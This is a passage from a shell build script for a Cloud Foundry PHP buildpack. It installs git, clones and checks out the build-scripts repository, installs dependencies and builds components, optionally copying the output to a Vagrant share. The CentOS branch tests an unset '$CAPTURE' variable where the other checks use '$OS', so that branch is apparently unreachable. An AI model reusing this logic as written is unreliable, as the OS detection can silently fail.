VERSION=$(cat /etc/issue | cut -d ' ' -f 2 | cut -d '.' -f 1,2)
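# e.g. an /etc/issue beginning "Ubuntu 14.04.2 LTS" yields OS=Ubuntu and,
# after the trim above, VERSION=14.04 (illustrative).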
# Install git
if ! hash git 2>/dev/null; then
echo "Git not installed on the local host. Attempting to install..."
if [ "$OS" == "Ubuntu" ]; then
if [ "$VERSION" == "10.04" ]; then
# Make sure we have a modern version of Git, as the version installed on Lucid
# fails to establish an SSL connection with GitHub.
# https://launchpad.net/~git-core/+archive/ubuntu/ppa
sudo apt-get update
sudo apt-get -y install python-software-properties
sudo add-apt-repository ppa:git-core/ppa
sudo apt-key adv --recv-keys --keyserver keyserver.ubuntu.com A1715D88E1DF1F24
sudo apt-get update
# for some reason ca-certificates gets bungled
# on VirtualBox after running the above. A simple reinstall fixes it.
sudo apt-get -y install --reinstall ca-certificates
fi
sudo apt-get update
sudo apt-get -y install git-core
elif [ "$CAPTURE" == "CentOS" ]; then
sudo yum install git
else
echo "Not sure about the remote OS, please manually install git."
exit 1
fi
fi
# clone repo
if [ ! -d cf-php-buildpack-binary-build-scripts ]; then
git clone https://github.com/dmikusa-pivotal/cf-php-buildpack-binary-build-scripts.git
cd cf-php-buildpack-binary-build-scripts
else
cd cf-php-buildpack-binary-build-scripts
git pull
fi
# check out right branch
VERSION=`echo $VERSION | cut -d '.' -f 1,2`
git checkout "$OS-$VERSION"
# create /home/vcap/logs
# This path is used at runtime, but is also required by some of the packages
# to exist at compile time.
# It's not actually used, other than to satisfy that requirement.
sudo mkdir -p /home/vcap/logs
# update / install dependencies
./build/install-deps.sh
# Clear output directory, gives us a fresh set of files
if [ -d output ]; then
rm -rf output/*
fi
# Build the component requested or all of them
if [ "$1" == "" ]; then
echo "Building all components."
./build/build-all.sh
else
if [ -f ./$1/build.sh ]; then
echo "Building component [$1]."
cd ./$1
./build.sh
cd ../
else
echo "Could not find component specified [$1]. Skipping."
fi
fi
# If using vagrant, move output to shared directory
if [ -d /vagrant ]; then
mkdir -p "/vagrant/output/$OS-$VERSION"
cp -R output/* "/vagrant/output/$OS-$VERSION/"
fi
|
dmikusa-pivotal/cf-php-buildpack-binary-build-scripts
|
build/run_local.sh
|
Shell
|
apache-2.0
| 2,767 |